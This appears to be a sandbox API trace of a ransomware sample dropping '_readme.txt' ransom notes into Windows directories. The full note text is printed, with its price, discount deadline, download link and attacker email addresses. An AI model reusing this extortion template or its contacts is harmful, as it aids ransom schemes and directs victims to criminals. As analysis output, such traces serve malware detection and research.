HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.717] PathFindFileNameW (pszPath="C:\\Boot\\cs-CZ\\") returned="cs-CZ\\" [0200.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.718] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0200.718] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.718] PathFindFileNameW (pszPath="") returned="" [0200.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.718] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0200.718] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0200.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3b65058 [0200.718] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0200.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b67060 [0200.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.718] FreeLibrary (hLibModule=0x75020000) returned 1 [0200.718] PathAppendW (in: pszPath="C:\\Boot\\cs-CZ\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0200.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0200.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.718] PathFileExistsW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 0 [0200.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b67060 [0200.720] lstrcpyW (in: lpString1=0x3b67060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0200.720] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0200.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0200.720] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\_readme.txt" (normalized: "c:\\boot\\cs-cz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0200.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0200.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67060 | out: hHeap=0x2c0000) returned 1 [0200.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.720] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0200.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.720] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.720] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0200.720] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0200.720] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0200.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0200.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0200.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0200.721] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0200.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.725] HeapFree (in: hHeap=0x2c0000, 